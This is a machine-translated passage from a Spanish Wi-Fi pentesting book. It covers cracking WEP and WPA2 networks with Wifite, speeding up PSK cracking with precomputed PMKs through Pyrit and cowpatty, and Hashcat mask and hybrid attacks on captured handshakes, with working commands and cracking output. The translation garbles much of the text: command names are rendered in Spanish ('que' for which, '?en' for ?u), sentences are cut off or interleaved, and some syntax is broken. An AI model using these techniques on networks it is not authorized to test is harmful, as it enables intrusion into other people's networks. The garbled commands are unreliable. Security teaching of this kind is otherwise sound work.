2. No use WPS, si su enrutador es vulnerable y use una frase de contraseña WPA2 segura.
3. Verifique si su enrutador se fabricó después de 2012, puede que no sea vulnerable.
63
Machine Translated by Google
3
WiFi automatizado
Agrietamiento
Wifite es una herramienta para auditar redes inalámbricas encriptadas WEP o WPA/2. Utiliza herramientas aircrack-ng,
pyrit, reaver, tshark para realizar la auditoría. Es una herramienta de plataforma Linux (viene preinstalada en Kali,
Backtrack, Pentoo, BackBox y otras distribuciones de pentesting) codificada en Python. Automatiza el proceso de piratería
de Wi-Fi y tiene como objetivo minimizar las entradas del usuario mediante el escaneo y el uso de bibliotecas de Python
para técnicas de automatización.
Utiliza herramientas como aircrack-ng, reaver, tshark, cowpatty para varios propósitos como
• Escaneo de aire
• Clave de craqueo
64
Machine Translated by Google
Antes de iniciar la herramienta, necesitamos aprender cómo instalarla y hacer que funcione como un comando, tal
como viene en todas las distribuciones de pentesting. Estos son los pasos que cubriremos en este tutorial.
• Descargando Wifite
• Instalación de Wifite como comando del sistema
• Descifrar WEP usando Wifite
• Descifrar WPA/2 usando Wifite
• Cómo corregir el error de captura de protocolo de enlace WPA/2 en Wifite
• Wi-Fi de enfoque
Vamos a empezar.
Descargar Wifite
Wifite estaba alojado anteriormente en [Link], pero ahora es un proyecto completo y está alojado en
GitHub. Para obtener las últimas actualizaciones, debe ir al enlace de GitHub, que puede encontrar en los resultados del
motor de búsqueda.
Puede descargarlo directamente aquí [Link]
La última versión (en el momento de escribir este artículo) es r87. Kali incluye la versión r87 por defecto, pero esa
versión tiene un error que veremos solucionar en este tutorial.
Ya hemos descargado el último script de Wifite y asumimos que está almacenado en nuestro escritorio.
Mover al escritorio
cd ~/Escritorio
~ refleja el directorio HOME en el shell. Verifique su directorio de inicio con echo $HOME
Aquí $HOME es una variable de entorno. /Desktop es el directorio almacenado en el directorio HOME.
unzip es la herramienta para extraer archivos de un archivo .zip. wifite*.zip significa cualquier archivo cuyo nombre inicial
sea Wifite y termine en .zip, aquí "*" significa cualquier cosa (incluido el espacio en blanco).
cd wifi*/
Cambia el puntero al primer directorio que comienza con el nombre "wifite" y / simboliza el directorio.
comprobar si el script funciona o no,
sesenta y cinco
Machine Translated by Google
python [Link]
como wifite es un script de python. Si (o cualquier secuencia de comandos) funciona bien, es posible que desee
convertirlo en un comando del sistema para que no tenga que atravesar el directorio cada vez. Es mejor simplemente
abrir la terminal y ponerse a trabajar.
Para eso, debe saber dónde se almacenan los comandos ejecutables reales en Linux, para que podamos hacer
una copia allí. Al igual que en los sistemas Windows, todos los comandos CMD se almacenan en \WINDOWS\System32\.
“
Ingrese cuál seguido de un simple "comando de Linux
cual es
qué comando nos dice la ubicación del comando pasado como argumento. que es ls (ell-ess) en este caso. Reflejará /
usr/ bin/ ls como salida.
Desde aquí sabemos que ls, el archivo ejecutable se almacena en el directorio /usr/ bin .
Ahora, lo que tenemos que hacer es mover nuestro script wifite a /usr/ bin/ y hacerlo ejecutable, si no lo está ya.
sudo significa Superusuario DO. Se utiliza para tomar el permiso de raíz (superusuario) para realizar ciertas
tareas.
cp se usa para copiar archivos, Sintaxis: cp “Fuente” “Destino”, donde la Fuente es [Link] y el destino es /usr/
bin/wifite. Además, wifite es el nombre del archivo de salida que nos gustaría usar como comando.
cp [Link] /usr/bin/[Link]
ls -l ./[Link] /usr/bin/wifite
-rwxr-xr-x 1 raíz raíz 161588 4 de julio 15:10 /usr/bin/[Link]
-rwxr-xr-x 1 raíz raíz 161588 4 de julio 15:08 [Link]
Aquí rwx significa Lectura, Escritura, Ejecutable. Todos ellos son atributos de archivo.
Hacer que wifite sea ejecutable (si no lo está ya), de modo que no sea necesario escribir python antes del archivo
nombre.
chmod cambia el modo de archivo (/ usr/ bin/ wifite) a +x, es decir, ejecutable.
Ahora wifite es un comando del sistema que puede ingresar sudo wifite en cualquier lugar de la Terminal (como root)
Pasemos ahora al Cracking.
66
Machine Translated by Google
No recomiendo usar ninguna herramienta de automatización a menos que haya aprendido el funcionamiento real de la secuencia de
comandos o el proceso que se ejecuta detrás de la secuencia de comandos. Los guiones son solo para reducir el tiempo y el esfuerzo.
Por favor, no confíe en los scripts. Mejor siga adelante y aprenda el proceso real por sí mismo, luego use herramientas de automatización
Estoy ejecutando una cuenta raíz de forma predeterminada. Si está ejecutando una cuenta estándar, use sudo.
wifi
Presione CTRL-C y seleccione el AP deseado con el tipo de encriptación WEP y escriba su NUM, vea la imagen a continuación.
Solo espere a que Wifite capture los IV (Vector de inicialización) y descifre la clave por usted.
El craqueo WEP es el más fácil de todos. esa es una de las razones por las que WEP ahora está depreciado, pero aún puede
encontrarlo en muchos lugares donde las personas no han cambiado su enrutador por un tiempo.
67
Machine Translated by Google
Después de que Wifite capture suficientes IV para descifrar la clave WEP, verá un resultado similar:
Tenga en cuenta que en la imagen de arriba, el total de IV capturados es de 52ÿ846 con una velocidad de 857 IV/ seg y la
Si tiene suficientes IV, la clave WEP se descifrará con seguridad, independientemente de la longitud y la
complejidad de la clave.
68
Machine Translated by Google
Después de capturar el protocolo de enlace, Wifite puede comportarse de 2 formas según las versiones (r87 o
anterior)
versión r85 o anterior: no utiliza ninguna lista de palabras hasta que se proporciona la opción -dict junto con un
archivo de diccionario. Ejemplo:
Poco después de que Wifite(r87) capture el protocolo de enlace, debería ver una opción similar:
69
Machine Translated by Google
Wifite usó un diccionario almacenado en Kali Linux por sí mismo, no se proporcionó ninguna opción y la contraseña no estaba
Eso es lo que suele ocurrir en el craqueo de WPA2. El cracking no tiene éxito ya que hay enormes no. de
distancia. Que podría ser una combinación de alfabetos [az, Az], números [0-9] y caracteres especiales (!, @, #, $, etc.)
Pero no hay necesidad de sentirse bajo. También existen varios métodos para recuperar la frase de contraseña WPA2, algunos
de los cuales aprenderemos en este libro.
En la imagen de arriba, puedes ver la ruta en la que Wifite ha almacenado el .cap (handshake)
archivo, es decir, /hs/. Puede copiar el archivo y usarlo para la fuerza bruta manual.
Wifite sigue escuchando el apretón de manos y desactivando a los clientes conectados en un bucle y no captura ningún
apretón de manos por ningún motivo. Mientras que si inicia airodump-ng en una nueva terminal, capturará los apretones de
manos. Wifite está desactivando a los clientes una y otra vez airodump-ng seguirá capturando los apretones de manos.
Sí, hubo un problema en el script de Wifite (r85, 587 [antiguo] en el que no se garantizaba que la desautorización
automática durante la captura del protocolo de enlace se deshabilitara en los intervalos esperados, lo que resultaba en la
70
Machine Translated by Google
Éste es muy simple. Mientras Wifite se ejecuta en segundo plano y no puede capturar el protocolo de
enlace. simplemente abra una nueva Terminal y ejecute airodump-ng seguido del nombre de archivo
de salida y la interfaz BSSID y channel_no .
Si hay clientes conectados, Wifite los desactivará y airodump-ng capturará el protocolo de enlace.
BSSID, Channel son muy importantes, ya que nuestra tarjeta inalámbrica puede operar en 1 frecuencia a
la vez. Wifite bloquea la tarjeta inalámbrica en el número de canal (frecuencia) similar a los AP para los que
estamos tratando de capturar el protocolo de enlace. Y por defecto, airodump-ng salta entre los canales. Entonces,
para evitar los errores, debemos decirle a airodump-ng que se bloquee en nuestro canal deseado, es decir, el
Canal 11 en este caso. Además, para evitar el apretón de manos de otro AP que podría estar operando en un
canal similar, usamos BSSID como filtro.
Si está utilizando Kali Linux, BackBox, Ubuntu, Mint, etc. más antiguos y enfrenta el problema, debe intentar
actualizar su versión de Wifite. Puedes hacerlo de 2 maneras.
• Utilice el comando wifite -update . ¿No funcionó?
• Intente descargar manualmente y ejecutar el script.
Aquí hay algo que debe tener en cuenta mientras actualiza usando el comando wifite -update . Es posible
que vea esta salida
`;,
`;, `;, Wi-Fite v2 (r87)
.;' .;' ,;' .;' ,;' ,;' `;, `;, `;,
:: :: : () : :: :: auditor inalámbrico automatizado
':. ':. ':. /_\ ,:' ,:' ,:' /___\ ,:' ,:' diseñado
':. ':. para Linux
':. /_____\ / ,:'
\ [!] la
actualización requiere una conexión a Internet
[+] buscando la última versión...
[-] tu copia de wifite está actualizada
[+] renunciar
Lo que suele suceder es que Wifite busca la última versión en GitHub, no por el tamaño del archivo.
pero por la versión, es decir, r87, que está preinstalada en Kali Linux. Pero aquí hay un problema, si observa la
última actualización de wifite en la página de GitHub, fue hace más de 3 meses y la versión instalada en Kali es
la misma, es decir, r87, pero el tamaño del archivo difiere ya que la versión de wifite de Kali no está fija sino 5
meses. la versión anterior es r87 pero se corrigió.
71
Machine Translated by Google
Lo comprobaremos descargando el último script wifite de GitHub y comparando el tamaño de archivo de ambos scripts.
Esto es lo que obtuve al verificar el tamaño del archivo de ambos scripts wifite, es decir, uno descargado y otro
preinstalado. ambos son r87
ls -lh $(que wifite) [Link]
-rwxr-xr-x 1 raíz raíz 154K 23 de julio de 2016 /usr/bin/wifite
-rwxr-xr-x 1 raíz raíz 158K 4 de julio 15:08 [Link]
Desglose de comandos:
ls: El comando se usa para enumerar archivos en un directorio
-lh: determinado, los argumentos de la línea de comando donde 'l' (ell, minúsculas) representa una lista de los detalles del archivo
y 'h' significa que el tamaño del archivo debe ser legible por humanos.
ps Una función bash utilizada para ejecutar otro comando dentro de un comando, que usamos para obtener la ruta al
script wifite instalado usando qué comando.
En el mundo Linux, el punto '.' significa directorio actual, seguido de “/” , es decir, directorio (no archivo).
Entonces “./” significa dentro del directorio actual y ./[Link] es el nombre del archivo ([Link]) en el directorio actual (./)
Permite que bash diferencie la ubicación del archivo con comandos.
Ahora observe el tamaño del archivo para ambos, 154 y 158 KB, respectivamente.
Ahora está familiarizado con los comandos utilizados. Saltemos al tamaño del archivo
Este cambio en el tamaño se debe al código editado. De la versión anterior, se editan muchas líneas para corregir el
error de Handshake. Por lo tanto, puede usar dos de las opciones para hacer el trabajo.
Por ejemplo, si estamos interesados en descifrar solo puntos de acceso de tipo WEP, usaremos
tienes -wep -p0841
-p0841 es el tipo de ataque que he encontrado más útil y funciona en la mayoría de los casos, por lo que podría ser
mejor para usted también usar -p0841 al descifrar WEP, lo salvará
72
Machine Translated by Google
De manera similar, para WPA/2, también le indicaremos a wifite que use nuestro diccionario deseado
Wifite ahora usará MY_DICT.txt ubicado en /media/ drive/ wordlists/ como una lista de palabras para descifrar la frase de
73
Machine Translated by Google
4
Acelerando WPA/2
Agrietamiento
Introducción
A estas alturas, debe estar familiarizado con la captura del protocolo de enlace de 4 vías y su uso con una lista de
palabras para descifrar el WPA2-PSK. Hay un tremendo espacio de nombres posible de frases de contraseña WPA2
que puede ser alfanumérico incluyendo caracteres especiales (8-63 caracteres). Además, prácticamente no hay
límite para la lista de palabras que podríamos crear. Incluso pueden alcanzar un tamaño de Peta/Exabytes, lo que
llevará tiempo hasta el próximo Big Bang para que la CPU/GPU agote el espacio de nombres, si se trata de una contraseña
segura.
Por lo tanto, debemos descubrir varias formas de descifrar WPA2-PSK en un corto período de tiempo.
Lo cual es posible si de alguna manera obtenemos el PSK a través del panel del enrutador, registrador de teclas o
usamos una GPU (no CPU) para usar sus múltiples núcleos para reducir la duración del craqueo, o incluso algo diferente.
Eso es lo que aprenderemos en este capítulo. Aumentaremos la velocidad de craqueo de WPA2 sin usar ninguna GPU
o nube. Lo cual puede ser muy útil con los AP con nombres muy comunes como "Airtel", "Netgear", "Belkin" , etc.
74
Machine Translated by Google
WPA2 se deriva de una función muy complicada llamada PBKDF2 (Función de derivación de clave basada en
contraseña). Como sugiere el nombre, el cracking depende de la frase de contraseña, también del SSID.
Este es el cuello de botella. PBKDF2 siempre escupe una clave de 256 bits sin importar la contraseña compleja
que le arroje (8-63 caracteres).
Donde:
FRP: Función pseudoaleatoria de 2 parámetros con longitud de salida hLen
(HMAC-SHA1)
Clave: Contraseña maestra a partir de la cual se genera una clave derivada
Sal: Secuencia de bits, conocida como sal criptográfica
C: Número de iteraciones, 4096 para WPA2
dkLen: Longitud deseada de la clave derivada, 256
NS: Clave derivada generada, clave de 256 bits
Cada clave derivada es única, lo que significa que si hay 2 puntos de acceso con diferente SSID pero la misma
frase de contraseña, el PMK será completamente diferente.
¿Qué es PMK?
Clave maestra por pares, una clave de 256 bits derivada de la función PBKDF2 que
utiliza el SSID, la frase de contraseña (PSK) y el algoritmo hash HMAC-SHA1. Este es el factor diferenciador
utilizado para la autenticación entre el AP y el Cliente. Se verá así:
Llave maestra : 1F 4B 02 FE 4C 82 F4 E0 26 2E 60 97 E7 BA D1 F1
92 83 B6 68 7F 08 4F 73 33 1D B8 6C 62 49 8B 40
Clave transitoria: D9 E6 11 68 BC F0 0D DF 75 BB 36 ED 38 F2 8A 22
BA DA 5F 97 CF 2E 6F B1 49 3A 53 2B 45 78 7C 0C
56 C8 CE D5 BD 64 99 04 E7 0C 1A 7C 2C D7 87 C4
D5 90 50 E6 ED 40 60 94 BB C9 06 AA 55 35 FF 88
EAPOL HMAC : 99 92 11 87 16 7C 8D F2 D1 F9 9B 8E DF 6F 4D 86
75
Machine Translated by Google
Necesitamos insertar el SSID junto con la Frase de contraseña porque, como se dijo anteriormente , WPA2-PSK depende
gato [Link]
red={
ssid="rootsh3ll"
#psk="iamrootsh3ll"
psk=1f4b02fe4c82f4e0262e6097e7bad1f19283b6687f084f73331db86c62498b40
}
Es exactamente lo mismo. Lo que confirma que el PMK calculado manualmente y el PMK calculado por aircrack-ng para un
¿Qué es CoWPAtty?
cowpatty es una herramienta de línea de comandos gratuita que automatiza el ataque de diccionario para WPA-PSK. Se
ejecuta en Linux. Es una implementación de un ataque de diccionario fuera de línea contra redes WPA/WPA2 usando
autenticación basada en PSK. cowpatty toma 2 tipos de entrada para descifrar WPA-PSK:
1. Lista de palabras estándar
cowpatty viene preinstalado en Kali Linux y está disponible para descargar desde
[Link]
¿Qué es Pirita?
Pyrit es una herramienta escrita en Python que le permite crear bases de datos masivas, calcular previamente el WPA2-PSK
para ahorrar tiempo. La técnica se llama intercambio de espacio-tiempo. Pyrit es compatible con CPU y GPU. para usar
JPaulMora/Pyrit
Si recuerda, en uno de los capítulos anteriores desciframos la frase de contraseña WPA2 usando aircrack-ng pasándole
Lo cual no es probable que sea posible, ya que la lista de palabras no tiene límite. La frase de contraseña puede estar en
cualquier diccionario que hayamos elegido o incluso puede estar ausente en el diccionario. Nosotros, como probadores de
penetración, simplemente no lo sabemos y también la velocidad de craqueo para WPA2-PSK es muy baja, por lo que necesitamos
76
Machine Translated by Google
para acelerar el proceso de alguna manera. Aquí es donde entra en escena el intercambio de espacio-tiempo.
Lo que realmente hacemos es calcular previamente la PMK (clave maestra por pares) con el SSID correspondiente y almacenarla
en un disco duro y podemos usarla en cualquier momento con el archivo Cap para el mismo SSID, ya que WPA2-PSK es SSID y
Sensible a la contraseña. Como hemos calculado previamente los PMK y los hemos almacenado en nuestro disco duro, es como una
toma mucho tiempo y la velocidad de craqueo es muy alta, ahorrándonos mucho tiempo.
La única condición es que debe haber un archivo precomputado con el mismo SSID y diferentes frases de contraseña
seleccionadas de una lista de palabras. Aunque incluso esto no garantiza descifrar la PSK, la velocidad de descifrado es
significativamente mayor que la de cualquier CPU o GPU, eso lo veremos en este tutorial.
Instalacion y configuracion
#Instalar pirita
77
Machine Translated by Google
Ejecutar en la Terminal:
GENPMK_rootsh3ll no existía, por lo que genpmk creó un nuevo archivo. En caso de que el archivo ya exista, los valores
hash se agregan al archivo existente.
Ahora espere a que genpmk termine de generar PMK. Y le mostrará la velocidad promedio (frases de contraseña/seg)
a la que generó PMK. el mio fue
Como ya he dicho, GenPMK es un programa de un solo subproceso. Aquí puede ver que mientras se ejecutaba GenPMK,
solo se usó un núcleo al 100%
78
Machine Translated by Google
Si observa, las opciones requeridas siguen siendo las mismas, solo hemos cambiado el nombre del archivo de salida con un prefijo
passthrough es una opción en pyrit que se usa para crear los PMK a partir de la frase de contraseña tomada del diccionario en un
momento. La velocidad es comparativamente alta desde GenPMK. Observe y compare la velocidad en la salida anterior
¿Ver la diferencia?
¿por qué?
Debido a que GenPMK es un programa de un solo subproceso, mientras que Pyrit es una herramienta que utiliza toda la potencia de
la CPU, es decir, 4, 8 o incluso 16 núcleos, Pyrit obtendrá la máxima potencia. Que es lo que hace que sea una mejor opción para
79
Machine Translated by Google
En este ejemplo, mantuve la contraseña real al final del archivo y verifiqué la velocidad máxima que alcanzó aircrack-ng
Vaya a Escritorio, donde se encuentran el archivo Pcap y las listas de palabras. Abrir terminal y simplemente escribir
Llave maestra : 1F 4B 02 FE 4C 82 F4 E0 26 2E 60 97 E7 BA D1 F1
92 83 B6 68 7F 08 4F 73 33 1D B8 6C 62 49 8B 40
Clave transitoria: D9 E6 11 68 BC F0 0D DF 75 BB 36 ED 38 F2 8A 22
BA DA 5F 97 CF 2E 6F B1 49 3A 53 2B 45 78 7C 0C
56 C8 CE D5 BD 64 99 04 E7 0C 1A 7C 2C D7 87 C4
D5 90 50 E6 ED 40 60 94 BB C9 06 AA 55 35 FF 88
EAPOL HMAC : 99 92 11 87 16 7C 8D F2 D1 F9 9B 8E DF 6F 4D 86
Fíjate en la velocidad:
1708,09 teclas/ seg, eso es lo que aircrack-ng alcanzó al máximo en mi sistema (i5, 2,5 GHz).
80
Machine Translated by Google
Ejecutar en la Terminal:
Recopiló todos los datos necesarios para montar crack contra la frase de contraseña WPA2/PSK.
Comenzando ataque de diccionario. Por favor sea paciente.
número de clave 10000: vicenzo
número de clave 20000: 13031991
clave nº 30000: nejihyuga
El PSK es "iamrootsh3ll".
También puede usar GENPMK_rootsh3ll, ambos son iguales. Estoy usando PYRIT_rootsh3ll porque contiene
más frases de contraseña (PMK) debido a la mayor velocidad de cálculo de Pyrit.
¿Ver la diferencia?
mismo sistema, misma RAM, sin GPU incluida y casi un 12,676 % de aumento en la velocidad.
Aircrack: 1708 frases de contraseña/segundo
Cowpatty con PMK pregenerado: 182297.19 frases de contraseña/segundo
Esto ha sido posible solo porque teníamos claves precalculadas y lo que tuvo que hacer cowpatty fue simplemente
hacer un bucle en el archivo hash, sin cálculos involucrados.
Una contraseña necesita 4096 iteraciones de CPU para salir con el PSK de 256 bits. Imagine una lista de
palabras que contenga 1 millón de frases de contraseña. ¿Cuántos ciclos de CPU se necesitarán para que esa lista
de palabras procese y genere los PMK? 4,096,000,000 eso es 4 mil millones de iteraciones para 1 millón de
palabras. Incluso 1 millón de palabras no son nada, los tamaños de diccionario van mucho más allá de Gigabytes o
Terabytes.
Esta es la razón por la que obtenemos velocidades de craqueo más bajas en comparación con el craqueo MD5, SHA1 Hash.
Ahora, hemos aprendido a crear PMK por separado y usarlos con cowpatty para aumentar las velocidades de
craqueo. Aquí hay un método, que no mejora la velocidad en comparación con aircrack-ng, pero es muy
interesante para aprender y ver el funcionamiento de los comandos y la terminal, ya que esta serie es para
principiantes, vale la pena.
Aquí lo que vamos a hacer es
1. Pase un diccionario (longitud de 8-63 caracteres) a pyrit y dígale que genere los PMK.
2. No escriba el resultado en un archivo, sino páselo a CoWPAtty.
3. cowpatty recibirá PMK como stdin (entrada estándar) y
4. Comienza el agrietamiento
81
Machine Translated by Google
Puede ver esto como una versión sofisticada de craqueo con aircrack-ng, ya que en aircrack-ng simplemente pasamos el
archivo cap y el diccionario. Esto será bastante largo y profundo en términos de comprensión.
Vamos a empezar
Ejecutar en la Terminal:
Sí, esto puede parecer muy confuso si eres un principiante en el mundo de Linux. Necesitas entender el comando.
Vamos a dividirlo para que sea simple y fácil de entender.
'|': Operador de canalización
Es un operador de shell de Linux que se usa para pasar la salida de un comando a otro (hacia el lado derecho), es decir,
después del operador.
Lo que hicimos fue pasar la salida del comando pyrit a cowpatty en tiempo real y
cowpatty se está ejecutando al mismo tiempo y está tratando de descifrar la frase de contraseña.
Si observa, verá que Before y After Pipeline son los mismos comandos que usamos anteriormente con solo una diferencia.
No usamos ningún nombre de archivo de salida con Pyrit (PYRIT_rootsh3ll anteriormente), ni tampoco un archivo de entrada
para cowpatty con la opción -d que es para el archivo hash (consulte el menú de ayuda de cowpatty -h ).
Usamos otra característica de Linux Shell para almacenar la entrada en STDIN (STanDard INput) y recibirla al mismo tiempo
desde STDIN. Esto se hace usando el operador '-'. Este operador funciona como STDINsalida
cuandohacia/desde
tenemos que
un archivo.
dirigir alguna
es
decir, escribir en un archivo Hash con pyrit y recibir información del archivo Hash con CoWPAtty.
Entonces, si nota que reemplazamos ambos nombres de archivo con '-', eso simplemente significa que Pyrit escribirá los
PMK calculados en la entrada estándar y la salida se pasará usando '|' operador al comando cowpatty . Ahora, en el mismo
momento en que cowpatty comienza a recibir
la entrada del STDIN, como se le indicó a la opción '-d', CoWPAtty tomará los PMK calculados del STDIN y comenzará
a descifrar el PSK. Si PMK coincidió, se encontrará la frase de contraseña; de lo contrario, pruebe con otros diccionarios
y continúe.
Recopiló todos los datos necesarios para montar crack contra la frase de contraseña WPA2/PSK.
Comenzando ataque de diccionario. Por favor sea paciente.
Uso de STDIN para contenido de archivos hash.
El PSK es "iamrootsh3ll".
82
Machine Translated by Google
La velocidad es casi similar a la que estaba calculando aircrack-ng porque los PMK se
calculan en tiempo real y se pasan a cowpatty. ¡La CPU se está consumiendo!
Espero que tengas una mejor idea de lo que sucede mientras descifras y aceleras todo
proceso.
Hay una cosa que me gustaría que echaras un vistazo: Airolib-ng para acelerar el Cracking
proceso
83
Machine Translated by Google
Aircrack y cowpatty utilizan la CPU como método principal para calcular los PMK. Seguro que nos da
un impulso, pero al usar PMK, en realidad no estamos aprovechando ningún poder de procesamiento.
Esto nos lleva a algunos inconvenientes del uso de PMK, como sigue:
• Específico de SSID: no puede usar PMK generados para SSID, diga "rootsh3ll" para otro SSID como "Belkin". Ni
siquiera "rootsh3ll".
• Se distingue entre mayúsculas y minúsculas : no se puede utilizar si se alteran las mayúsculas y minúsculas de los caracteres. Ej: no funcionará para
• El tiempo utilizado es el mismo: como la potencia de procesamiento de la CPU es la misma en ambos casos, el
tiempo necesario para crear PMK es el mismo incluso si utiliza Aircrack o crea PMK (con GenPMK).
• Menos útil en el mundo real: hoy en día, los enrutadores se envían con un SSID único.
Ej: Belkin_04A2 para evitar que los enrutadores sufran este tipo de ataques o al menos retrasar la duración del
craqueo.
Podría estar pensando ahora que si esto es así, ¿por qué consideraría los PMK para descifrar?
Bueno, como dije anteriormente, esto es menos útil, eso significa que en algunos casos.
Casos como:
• Antes de intentar cualquier tarea compleja para descifrar el PSK, si ya tiene almacenados PMK.
darles una oportunidad
Aún así, incluso si esto proporciona velocidad, este método es un poco lento. No siempre tienes un amigo listo para
darte un PMK específico de SSID generado previamente justo cuando has capturado el apretón de manos, ¿verdad? si,
es muy raro!
Aquí es cuando necesita mantener la CPU (para descifrar) a un lado y encender la GPU al máximo
energía.
Si no está al tanto del uso de GPU para descifrar, déjeme decirle, las GPU se usan para descifrar hashes de contraseña y
se están usando ahora por un tiempo.
Hay muchas herramientas que usan GPU y le ahorran mucho tiempo por el costo de unos pocos dólares que pagará
usando la electricidad utilizada por los núcleos de GPU. Pero, está bien, puedes ganar dinero de nuevo, ¡no tiempo!
84
Machine Translated by Google
Herramientas como:
hachís _
• pirita
• BarrasWF
• igHashGPU
¿Cómo? ¡Sencillo! Su CPU tiene 2,4,8 núcleos, lo que significa unidades de computación paralelas donde las GPU las
tienen en miles, si no cientos.
Mi GeForce GT 525M tiene 296 núcleos y es una tarjeta gráfica bastante desactualizada.
Velocidad: ~6000 PMK/ s. NVidia Titán X es la mejor tarjeta gráfica individual con una velocidad de craqueo de hasta
2ÿ096ÿ000 hash/seg.
• Pirita
• HashCat
Hashcat, que es la herramienta más rápida y versátil, junto con un desarrollo activo, será nuestra herramienta de
referencia para este capítulo.
¿Qué es Hashcat?
Ocl/CUDA Hashcat ahora es de código abierto. Pago en GitHub: [Link]
Hashcat es un descifrador de contraseñas más rápido del mundo basado en la línea de comandos autoproclamado.
Es el primer y único motor de reglas basado en GPGPU del mundo y está disponible para Linux, OSX y Windows sin
costo alguno. Viene en 2 variantes
• Basado en CPU
• Basado en GPU
No hay diferencia al pasar comandos a Hashcat porque utiliza automáticamente el mejor método para descifrar contraseñas,
ya sea CPU o GPU, según el controlador de gráficos que haya instalado.
85
Machine Translated by Google
Además, Hashcat ha estado superando a Pyrit durante muchos años. y si todavía está usando Pyrit, ¡ahora es el momento de
cambiar a Hashcat!
Para almacenar hashes, necesita mucho espacio en disco. Como puede ver en la imagen a continuación, hay algunas listas de
palabras que casi ocupan más de 25 GB en el disco (Extraídas), y lleva más de 2 o 3 días ejecutarlas todas, incluso con GPU.
Pero, la mayoría de las veces, hay algún patrón (contraseñas predeterminadas) que nos gusta probar para verificar su
• Fecha de nacimiento
Aquí es cuando tenemos que dejar Pyrit con sus diccionarios y ponte manos a la obra con Hashcat.
Hashcat tiene una característica brillante llamada ataque de máscara, que nos permite crear patrones definidos por el usuario
para probar la validez de la contraseña y ¿sabes qué es lo mejor? Requiere 0 Bytes en su disco duro.
¿Cómo?
Primero debe comprender que, en algunos casos, necesitamos listas de palabras. Solo cuando estamos muy seguros de que
tiene algún tipo de patrón, podemos usar este tipo de ataque. Entonces, si sabe que cierto ISP tiene números aleatorios de 10
dígitos y solo unas pocas letras, puede hacerlo para ahorrar espacio en su HD.
El descifrado de WPA/2 es una tarea tediosa y utiliza la máxima potencia del sistema cuando usamos Hashcat y, a veces,
86
Machine Translated by Google
Estos son por nombrar algunos. Hashcat admite demasiados algoritmos para descifrar su hash.
NOTA: el ataque de fuerza bruta tradicional está desactualizado y se reemplaza por el ataque de máscara en Hashcat.
Veremos más adelante en este post en detalles sobre esto.
El sistema operativo instalado en una máquina virtual no tiene acceso a la tarjeta gráfica ni a la aceleración de la GPU.
Entonces, me quedaré con Hashcat en Windows (máquina host). Todavía puede hacer la misma tarea con exactamente
los mismos comandos en Kali Linux (o cualquier sistema operativo Linux) u OSX con controladores propietarios instalados
correctamente.
Descargar hashcat
87
Machine Translated by Google
Convierta sus archivos Pcap manualmente en Kali Linux, use el siguiente comando
Sintaxis: wpaclean <[Link]> <[Link]>
wpaclean raícesh3ll_hashcat.cap raí[Link]
Tenga en cuenta que las opciones de wpaclean están al revés. <[Link]> <[Link]> en lugar de <[Link]>
<[Link]> lo que puede causar cierta confusión.
Ahora suponiendo que ha instalado el controlador de gráficos apropiado para el sistema operativo
seleccionado, continúe con el siguiente paso. Necesitamos convertir el apretón de manos capturado previamente, es decir
pcap en un formato que Hashcat pueda entender y es el formato de archivo .hccap.
Nada difícil o toma tiempo. El comando para convertir .cap a .hccap es así:
Aquí [Link] es el nombre del archivo de salida con formato de archivo .hccap y [Link] es el
protocolo de enlace capturado originalmente.
Inicie sesión en Kali Linux y escriba en Terminal:
aircrack-ng -J “[Link]” “[Link]”
Ahora tenemos un archivo hccap , un controlador de gráficos instalado y Hashcat descargado. Comencemos el
agrietamiento.
Abra CMD en el directorio Hashcat, copie el archivo hccap y las listas de palabras y ejecute:
[Link] -m 2500 [Link] [Link] [Link]
Aquí tengo la tarjeta gráfica de NVidia, así que uso el comando Hashcat seguido de 64, ya que estoy usando la
versión de Windows 10 de 64 bits. el tuyo dependerá de la tarjeta gráfica que estés usando y de la versión de
Windows (32/64).
Desglose de comandos:
[Link]: el programa, en la misma carpeta hay un [Link] para SO de 32 bits y
[Link] / [Link] para Linux.
-m 2500: El tipo de hash específico. 2500 significa WPA/WPA2.
88
Machine Translated by Google
Para simplificarlo un poco, cada lista de palabras que haga debe guardarse en la carpeta Hashcat.
Después de ejecutar el comando, debería ver un resultado similar:
Espere a que Hashcat termine la tarea. Puede pasar varias listas de palabras a la vez para que Hashcat siga probando
la siguiente lista de palabras hasta que coincida la contraseña.
Como se dijo anteriormente, el ataque Mask es un reemplazo del ataque tradicional de fuerza bruta en Hashcat para
obtener resultados mejores y más rápidos.
89
Machine Translated by Google
La cadena de texto anterior se llama "Máscara". Cada par que usamos en los ejemplos anteriores se traducirá en el carácter
correspondiente que puede ser un carácter alfabético/dígito/especial.
Para recordar, solo vea el carácter utilizado para describir el juego de caracteres.
?d: para dígitos
?s: Para caracteres especiales
?en: Para alfabetos en mayúsculas
?l: Para alfabetos en minúsculas
?un: Todo lo anterior.
Aquí está el conjunto de caracteres real que indica exactamente qué caracteres están incluidos en la lista:
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = «espacio»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a = ?l?u?d?s
Aquí hay algunos ejemplos de cómo se vería el PSK cuando se pasa una máscara específica.
Máscara = ?d?l?u?d?d?d?u?d?s?a
0aC575G2/@
9zG432H0*K
8sA111W1 $ 4
3wD001Q5 + z
Entonces ahora deberías tener una buena comprensión del ataque de la máscara, ¿verdad?
Suponga que de alguna manera llega a conocer una parte de la contraseña. Sería mejor si ponemos esa parte en el ataque
He ?d ?l 123 ?d ?d ?u ?d C es el ataque de máscara personalizado que hemos usado. Aquí asumiendo que tu
90
Machine Translated by Google
Conozca los primeros 2 caracteres de la contraseña original y luego configure el segundo y tercer carácter como dígito y letra
minúscula seguido de 123, luego ?d ?d ?u ?d y finalmente termine con C como ya sabía.
Lo que realmente hicimos es que simplemente colocamos los caracteres en la posición exacta que conocíamos y
enmascaramos los caracteres desconocidos, por lo tanto, dejamos que Hashcat realice más pruebas.
Donde ?u será reemplazado por letras minúsculas, una por una hasta que la contraseña coincida o se agoten las
posibilidades.
Avanzando aún más con el ataque de máscara, es decir
Ataque híbrido.
En el ataque híbrido, lo que realmente hacemos es no pasar ninguna cadena específica a Hashcat manualmente,
sino automatizarla pasando una lista de palabras a Hashcat.
Hashcat recoge las palabras una por una y las prueba con todas las contraseñas posibles según la Máscara definida.
Desglose de comandos:
-un 6: El ataque híbrido
contraseñ[Link] ? Lista de palabras
2. pie grande
3. invitado
4. cebolla
Ahora usará las palabras y las combinará con la Máscara definida y la salida debería ser esta:
carlos2e1c
pie grande0h1d
invitado5p4a
